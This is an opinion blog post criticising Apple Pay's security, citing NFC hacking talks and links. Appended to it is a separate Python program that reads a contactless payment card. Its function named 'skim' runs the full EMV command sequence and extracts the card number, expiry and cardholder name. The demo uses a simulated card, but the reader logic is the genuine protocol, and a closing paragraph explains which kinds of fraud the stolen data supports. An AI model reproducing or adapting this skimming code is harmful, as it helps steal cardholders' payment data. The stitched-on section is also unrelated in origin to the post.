Apple Plays

Apple introduced the iPhone 6 this week and spent time talking about size, display and CPU speed, but it also spent an exorbitant amount of time, marketing dollars and effort pushing a new feature most people couldn't care less about: Apple Pay.

What is Apple Pay?

Apple Pay is a payment service on the iPhone that stores and transmits your credit card information.  Let that sink in before moving on.


Apple has not yet released many details to the public on exactly how Apple Pay works, and the media has several different guesses about how the system will work.  Gartner claims no credit card information will be stored on the phone and that it will use your iTunes credit card information; others, including Apple, say your card details will be stored on the phone.  The Washington Post writer assures his readers that because of the iPhone's fingerprint reader, no one else will be able to make purchases with your phone.  He doesn't bother to mention that the fingerprint reader was hacked less than two days after it was released.  The same article says virtual card numbers, not your actual card number, are what your phone will send to the merchant.

Going by the docs from Stripe.com, a third party offering an API that lets merchants accept Apple Pay without doing all the integration on their own, it would seem that credit card information is stored on your iPhone and that, depending on the merchant, you will be sending them your card number, CVC code, name, expiration date and billing address, all information they can choose to store for later use if they decide they want to.  Stripe.com's documentation includes frightening phrases such as "Make sure any communication with your server is SSL secured to prevent eavesdropping."  (The channel Stripe is talking about there is between the merchant's own app and the merchant's own server, which is the merchant's to secure.)  Shouldn't Apple Pay force SSL communication?

This is all speculation at this point, but I think Stripe.com likely has better information than the Washington Post and Gartner.

However, I couldn't leave out this little gem from Makeuseof.com, which stays in lock step with the party line, claiming that anyone who doesn't fully embrace Apple's latest feature as the greatest change to the monetary system since the advent of coins is a lunatic alien abductee.

“Those of you reaching for your tinfoil hats will be relieved to hear the usual security and privacy spiel from such an announcement involving sensitive financial data. Merchants cannot see card numbers, Apple cannot tell what you are buying, and if you lose your phone, you can simply suspend the service using Find My iPhone.”

All but the last part, about using Find My iPhone, is incorrect, but it doesn't matter because they don't address the real security concerns.

Update: According to NerdWallet, Apple will get 0.15% of each transaction, paid to them by the bank issuing the credit card.  This new fee, on top of the regular per-transaction fees paid for the convenience of using a card instead of cash, will unwittingly be paid by the consumer.  When you think about the concept of paying a company to lend you your own money, with interest and fees added on, you may begin to understand that using cash and living within a realistic budget is better than using Apple or any credit card company.

The Real Point Please?

Here is the main problem with Gartner, WaPo and all of the internet sites claiming there is nothing to worry about.  They all talk about how the transaction is secure, how the merchant doesn't actually get your card details, how a random number or one-time token is going to keep your purchase secure.  Great.  But what about the phone?  How secure is the device where you are storing the cards, with all the information needed to use each one of them?  I don't recall Apple talking about how secure their phone and new OS are, and none of the websites fighting for your precious monetized clicks talk about how secure the platform storing all your data is.  Instead they assure you that Apple has it all figured out; after all, it's Apple!  They never have security problems, just ask Kate Upton, Kirsten Dunst, Jennifer Lawrence or Jonathan Zdziarski.  Jonathan is the researcher who recently presented a paper on how every iOS device runs hidden and undocumented services that allow access to phone data, even bypassing the encryption on iTunes backups, all without needing physical access to your phone (as he describes it, from any computer the phone has previously been paired with).  It doesn't take much thought to figure out how someone could get at the photos of celebrities, your spouse or yourself stored in iCloud.

When Target and the other retailers had their POS systems hacked, the attackers did not go after individual payments; they wanted the card data so they could sell the cards on the black market, and those who bought the cards would use them to make fraudulent purchases, clean out accounts or worse.  Talking about how a single transaction is secure is only interesting if you are a merchant, bank, card processor or Apple.  The consumer loses nothing if a retailer or bank doesn't secure a transaction, because the consumer is covered.  But if a consumer has their savings account drained to $0, they are simply out all of their savings.  The banks, card processor and retailer will happily take that stolen money.

One Last Thing

Apple Pay uses NFC to transmit your purchase details.  In 2012, 2013 and 2014 there were public demonstrations of how to attack NFC payment systems to steal card data, send payments and transfer funds.  It's unfortunate that Apple and the media won't spend the 30 seconds it takes to Google "NFC credit card hack" and watch the videos, read the conference notes and articles on how insecure NFC really is.

Apps use NFC technology to hack Credit Card credentials
Oct 16, 2013 – After months Google still hasn't fixed the issue letting apps from the Play Store use NFC technology to steal credit card credentials.

NFC Hacking: The Easy Way – Eddie Lee, DEF CON 20 [PDF]
https://www.defcon.org/images/…/DEFCON-20-Lee-NFC-Hacking.pdf
Covers the exchange between chipped credit cards and POS terminals, using a contactless credit card reader (e.g. VivoPay, Verifone).

Hacking the NFC credit cards for fun and debit – Renaud Lifchitz, Hackito Ergo Sum 2012 (April 12-14, Paris, France) [PDF]
Apr 3, 2012 – "How to recognize an NFC-enabled credit card? Small wave logo printed on the …"

How NFC phones can steal your credit card info – YouTube
Jan 27, 2012 – Uploaded by Id Stronghold

Hacking the NFC credit cards for fun and debit by Renaud Lifchitz – YouTube
www.youtube.com/watch?v=VWIzW0rRw_s
Jul 24, 2012 – Uploaded by Shakacon LLC

[NFC HACK] : Use Pass Snow card or transport card with your … – YouTube
www.youtube.com/watch?v=B0pTdNrEXnI
Mar 8, 2013 – Uploaded by iHeathOfficial

Android NFC hack lets subway riders evade fares – Naked Security (Sophos)
nakedsecurity.sophos.com/…/android-nfc-hack-lets-subway-rider…
Sep 24, 2012 – Benninger said during his talk that he could replenish his card endlessly, according to Computerworld.

Credit Card stealing Apps from NFC cards – secure-commerce.org
www.secure-commerce.org/…/credit-card-stealing-apps-from-nfc-cards/
Apr 29, 2013 – Reports in Mashable and CBS that there are now apps available to read and hack the NFC data on credit cards.

The Perfect Hack for Enabling NFC Credit Card Payments … – Business Insider
www.businessinsider.com/the-perfect-hack-for-enabling-…
Aug 3, 2011 – "Remember the good ol' days when you actually had to swipe your credit or debit card to make a pay…"

Hacking the NFC Credit Cards for Fun and Debit by Renaud Lifchitz – SlideShare (slides from Shakacon 2012, June 18-21)
www.slideshare.net/…/hacking-the-nfc-credit-cards-for-fun-and-debit-by…
Jul 2, 2012
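To make concrete what the card-reading demonstrations listed above (the DEF CON 20 and Shakacon talks in particular) rely on, here is an added example; it is not code from this post or from any of the linked talks. It simulates the four unauthenticated commands a reader sends to an EMV contactless card (SELECT PPSE, SELECT AID, GET PROCESSING OPTIONS, READ RECORD) and the BER-TLV parsing needed to pull the card number and expiry out of the replies. The card class, the `skim` function and all other names are this example's own; the AID is Visa's public application identifier, and the card number is the well-known 4111 1111 1111 1111 test number, not a real account.

```python
"""Simulated EMV contactless read (added example, constructed data).

Nothing in this exchange is authenticated or encrypted: a phone or reader
within range gets the same answers a legitimate terminal does.
"""
from __future__ import annotations

AID = bytes.fromhex("A0000000031010")   # Visa's public payment AID; card data is fake
PPSE = b"2PAY.SYS.DDF01"                 # Proximity Payment System Environment name
SW_OK = b"\x90\x00"


def tlv(tag: bytes, value: bytes) -> bytes:
    """Encode one BER-TLV element (short-form length is enough for this example)."""
    assert len(value) < 0x80
    return tag + bytes([len(value)]) + value


def tlv_parse(data: bytes) -> dict:
    """Flatten BER-TLV data into {tag_hex: value}, descending into constructed tags."""
    out, i = {}, 0
    while i < len(data):
        if data[i] in (0x00, 0xFF):          # inter-element padding bytes
            i += 1
            continue
        start, first = i, data[i]
        i += 1
        if first & 0x1F == 0x1F:             # multi-byte tag, e.g. 5F24, BF0C
            while data[i] & 0x80:
                i += 1
            i += 1
        tag = data[start:i].hex().upper()
        length = data[i]
        i += 1
        if length & 0x80:                    # long-form length
            n = length & 0x7F
            length = int.from_bytes(data[i:i + n], "big")
            i += n
        out[tag] = data[i:i + length]
        if first & 0x20:                     # constructed tag: recurse into its value
            out.update(tlv_parse(out[tag]))
        i += length
    return out


class FakeContactlessCard:
    """Constructed card: answers with no PIN, no tap confirmation, no reader auth."""

    def __init__(self, pan: str, expiry_yymm: str, name: bytes):
        self.pan, self.expiry, self.name = pan, expiry_yymm, name

    def transmit(self, apdu: bytes) -> tuple[bytes, bytes]:
        ins, p1, p2, lc = apdu[1], apdu[2], apdu[3], apdu[4]
        body = apdu[5:5 + lc]
        if ins == 0xA4 and body == PPSE:     # SELECT PPSE -> list of applications
            app = tlv(b"\x61", tlv(b"\x4F", AID) + tlv(b"\x50", b"FAKE VISA"))
            fci = tlv(b"\x84", PPSE) + tlv(b"\xA5", tlv(b"\xBF\x0C", app))
            return tlv(b"\x6F", fci), SW_OK
        if ins == 0xA4 and body == AID:      # SELECT AID -> application FCI
            return tlv(b"\x6F", tlv(b"\x84", AID) + tlv(b"\xA5", tlv(b"\x50", b"FAKE VISA"))), SW_OK
        if ins == 0xA8:                      # GET PROCESSING OPTIONS -> AIP + AFL
            afl = tlv(b"\x94", bytes([1 << 3, 1, 1, 0]))   # SFI 1, records 1..1
            return tlv(b"\x77", tlv(b"\x82", b"\x00\x00") + afl), SW_OK
        if ins == 0xB2 and p1 == 1 and p2 >> 3 == 1:       # READ RECORD SFI 1, record 1
            t2 = self.pan + "D" + self.expiry + "101" + "00000000"   # PAN D YYMM svc disc.
            t2 = bytes.fromhex(t2 + "F" * (len(t2) % 2))
            rec = (tlv(b"\x57", t2) + tlv(b"\x5A", bytes.fromhex(self.pan))
                   + tlv(b"\x5F\x24", bytes.fromhex(self.expiry + "31"))
                   + tlv(b"\x5F\x20", self.name))
            return tlv(b"\x70", rec), SW_OK
        return b"", b"\x6A\x82"              # file or application not found


def send(card, cla: int, ins: int, p1: int, p2: int, data: bytes = b"") -> bytes:
    """Send one APDU and fail loudly if the card does not answer 9000."""
    resp, sw = card.transmit(bytes([cla, ins, p1, p2, len(data)]) + data + b"\x00")
    if sw != SW_OK:
        raise RuntimeError(f"INS {ins:02X} failed, SW={sw.hex()}")
    return resp


def decode_track2(t2: bytes) -> tuple[str, str]:
    """Track 2 equivalent data: PAN, 'D' separator, YYMM, service code, discretionary."""
    pan, rest = t2.hex().upper().rstrip("F").split("D", 1)
    return pan, rest[:4]


def luhn_ok(pan: str) -> bool:
    """Mod-10 check: confirms the digits read off the card have a real PAN shape."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch) * (2 if i % 2 else 1)
        total += d - 9 if d > 9 else d
    return total % 10 == 0


def skim(card) -> dict:
    """Reader side: PPSE -> AID -> GPO -> READ RECORD, then extract the card data."""
    aid = tlv_parse(send(card, 0x00, 0xA4, 0x04, 0x00, PPSE))["4F"]
    send(card, 0x00, 0xA4, 0x04, 0x00, aid)
    gpo = tlv_parse(send(card, 0x80, 0xA8, 0x00, 0x00, b"\x83\x00"))  # empty PDOL data
    found, afl = {}, gpo["94"]
    for i in range(0, len(afl), 4):          # AFL entry: SFI<<3, first rec, last rec, #auth
        sfi, first, last = afl[i] >> 3, afl[i + 1], afl[i + 2]
        for rec in range(first, last + 1):
            found.update(tlv_parse(send(card, 0x00, 0xB2, rec, (sfi << 3) | 4)))
    pan, exp = decode_track2(found["57"])
    return {"aid": aid.hex().upper(), "pan": pan, "expiry_yymm": exp,
            "name": found.get("5F20", b"").decode("ascii", "replace"),
            "luhn_ok": luhn_ok(pan),
            "pan_matches_tag_5a": found.get("5A", b"").hex() == pan}


if __name__ == "__main__":
    print(skim(FakeContactlessCard("4111111111111111", "2512", b"DOE/JOHN")))
```

What comes back is the Track 2 equivalent data, the PAN, the expiry date and (on many cards) the cardholder name, which is exactly what the talks above show an NFC phone reading through a pocket or bag. What is not on the contactless interface is the CVC2 printed on the back of the card, so the skimmed data feeds magstripe-style and some card-not-present fraud rather than every kind; the one-time cryptogram generated per tap is what ties a contactless transaction to the card, and it does nothing to protect the static PAN and expiry read here.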